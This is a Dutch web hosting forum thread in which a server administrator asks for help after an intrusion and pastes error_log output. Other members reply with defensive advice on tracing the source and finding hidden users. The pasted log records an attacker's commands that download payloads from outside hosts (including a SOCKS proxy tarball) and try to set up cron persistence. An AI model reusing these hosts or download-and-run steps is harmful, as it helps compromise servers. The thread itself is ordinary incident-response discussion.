Likes Likes:  0
Resultaten 1 tot 6 van de 6
Geen
  1. #1
    Probleem hack script oid op server
    geregistreerd gebruiker
    143 Berichten
    Ingeschreven
    06/02/13

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    1 Berichten zijn liked



    Thread Starter

    Probleem hack script oid op server

    Hoi,

    Sinds een dag of wat hebben we last van personen die een script vanuit de /tmp proberen op te starten.

    Als we in de tmp map kijken staat er niets.

    de error_log laat iets zien alla

    --2015-02-01 13:51:25-- http://www.alrpost69.com/httpd
    Resolving www.alrpost69.com... 206.248.0.3
    Connecting to www.alrpost69.com|206.248.0.3|:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2015-02-01 13:51:26 ERROR 404: Not Found.

    chmod: missing operand after `777'
    Try `chmod --help' for more information.
    sh: line 1: httpd: command not found
    sh: line 1: httpd: command not found
    /bin/rm: cannot remove `httpd': No such file or directory
    --2015-02-01 13:51:26-- http://socks5.so/snew.tar
    Resolving socks5.so... 199.175.54.32
    Connecting to socks5.so|199.175.54.32|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 30720 (30K) [application/x-tar]
    Saving to: "snew.tar"

    0K .......... .......... .......... 100% 290K=0.1s

    2015-02-01 13:51:26 (290 KB/s) - "snew.tar" saved [30720/30720]

    perl: no process killed
    You (apache) are not allowed to use this program (crontab)
    See crontab(1) for more information
    Could not bind to 2a01:7c8:aaae:3e3:5054:ff:fe84:914:36275

    Heb ook al met maldet een scan gedaan. Kan ook niets vinden.

    wie o wie?

    Gerard

  2. #2
    Probleem hack script oid op server
    moderator
    7.022 Berichten
    Ingeschreven
    29/07/03

    Locatie
    Nijmegen

    Post Thanks / Like
    Mentioned
    12 Post(s)
    Tagged
    0 Thread(s)
    175 Berichten zijn liked


    Naam: Mike
    Bedrijf: admin.nu
    URL: www.admin.nu
    Registrar SIDN: Ja
    KvK nummer: 09139651

    Probleem komt uit de website, of uit de modules die erin gebruikt zijn. Derden kunnen code executen via een omweg waarbij de huidige code niet in staat is om dit af te vangen.
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  3. #3
    Probleem hack script oid op server
    geregistreerd gebruiker
    143 Berichten
    Ingeschreven
    06/02/13

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    1 Berichten zijn liked



    Thread Starter
    Hoi,

    Uiteindelijk 2 bestanden gevonden via maldet. Echter stonden de 2 bestanden in de map clean van maldet. Wazig.

    Echter nog geen idee hoe ze daar terecht zijn gekomen en wie ze daar heeft geplaatst? tips?

  4. #4
    Probleem hack script oid op server
    moderator
    7.022 Berichten
    Ingeschreven
    29/07/03

    Locatie
    Nijmegen

    Post Thanks / Like
    Mentioned
    12 Post(s)
    Tagged
    0 Thread(s)
    175 Berichten zijn liked


    Naam: Mike
    Bedrijf: admin.nu
    URL: www.admin.nu
    Registrar SIDN: Ja
    KvK nummer: 09139651

    ftp logfiles en apache logfiles
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  5. #5
    Probleem hack script oid op server
    Webhoster
    444 Berichten
    Ingeschreven
    23/05/06

    Locatie
    Almere

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    24 Berichten zijn liked


    Naam: Jorden / Martin
    Bedrijf: TotallyHosted
    URL: www.totallyhosted.nl
    Registrar SIDN: Ja
    KvK nummer: 39087225
    Ondernemingsnummer: nvt

    Vaak kun je met behulp van de aanmaaktijden van de bestanden die je terugvindt, wel in je logs terugvinden welke site ervoor verantwoordelijk is.
    TotallyHosted Webhosting - https://www.totallyhosted.nl



  6. #6
    Probleem hack script oid op server
    geregistreerd gebruiker
    580 Berichten
    Ingeschreven
    27/01/09

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    58 Berichten zijn liked


    Naam: Wim
    Registrar SIDN: nee

    Met scanners kan je niet veel beginnen. Ik heb de .tar even door virustotal.com gejaagd en geen enkel AV herkent dit.

    Ze proberen een mini socks server (sss) te installeren, mogelijk als IRC proxy. Al hun download sites zijn nog operationeel, dus ik vermoed dat ze gaan terugkomen met verbeterde versies. Deze kan je als beta beschouwen.

    Zoek naar verborgen users. De laatste die ik tegenkwam, hadden creatieve namen als cache, php, perl of iets met java in de naam.
    Laatst gewijzigd door cyrano; 02/02/15 om 18:57.

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2021 Webhostingtalk.nl.
Web Statistics